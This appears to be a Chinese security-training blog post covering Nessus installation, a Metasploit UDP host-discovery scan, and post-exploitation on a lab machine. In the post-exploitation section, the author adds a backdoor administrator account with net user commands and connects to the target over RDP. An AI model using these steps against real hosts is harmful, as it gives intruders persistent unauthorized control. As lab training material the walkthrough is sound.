1. 程式人生 > >nessus安裝、msfconsole輔助模組使用(網安全實訓第三天)

nessus安裝、msfconsole輔助模組使用(網安全實訓第三天)

本期內容:nessus安裝、msfconsole輔助模組使用、後滲透攻擊

1. nessus安裝

2.msfconsole輔助模組使用

3.後滲透攻擊

1. nessus安裝

(1)下載nessus

我下載的Nessus-7.1.0-x64.exe

(2)去官網獲取啟用碼

家庭版免費試用,點選Register Now

填寫資訊,郵箱地址一定要填寫正確,等幾分鐘,就會在郵箱收到啟用碼,待會兒啟用的時候要用到。

(3)安裝nessus,一直下一步,中間有一個安裝winpcap網絡卡,安裝就好了,如果提示已存在高版本winpcap,就把原來的解除安裝了再重新安裝。

(4)nessus採用在本地搭建伺服器的方式,當上一步安裝完成後,會彈出如下介面:

點選綠色按鈕,之後會進行初始化,等待完成。

(5)建立賬戶

建立用於登陸nessus的賬戶。

(6)填入激啟用碼。

(7)進入下一步,從nessus伺服器下載外掛。這一步需要搭梯子,具體方法可以參考網上的教程,也可以參考我隨後更新的另一篇文章,我使用ssr搭梯子。

(8)安裝成功,進入登陸介面。

(9)登陸進去看一下

這裡有很多之前建立的掃描任務,如果要建立新任務,直接點選右上角New Scan

順便貼一張掃描結果圖片:

靶機上面漏洞很多,顯示也很直觀。

2.msfconsole輔助模組使用

msfconsole裡面還有輔助模組:auxiliary、

在這裡,我們使用 auxiliary/scanner/discovery/udp_sweep對區域網進行主機發現掃描,當然,還有很多其他模組,可以通過tab補全的方式檢視。

use auxiliary/scanner/discovery/udp_sweep

show options

set RHOSTS 192.168.13.0/24

set THREADS 10

run

3.後滲透攻擊

接上午實驗,我們已經通過ms08_017漏洞成功控制對方主機,接下來我們進行後滲透攻擊。

(1)建立使用者並加入administrators組

net user abin 123 /add
net localgroup administrators abin /add

(2)進行遠端連線

使用netstat -an檢視對方主機開啟埠:

發現對方並已經開啟3389埠。

(3)開啟bt5的圖形介面,輸入rdesktop 192.168.183.132進行連線。

startx
rdesktop 192.168.183.132

輸入剛才建立的賬號進行連線。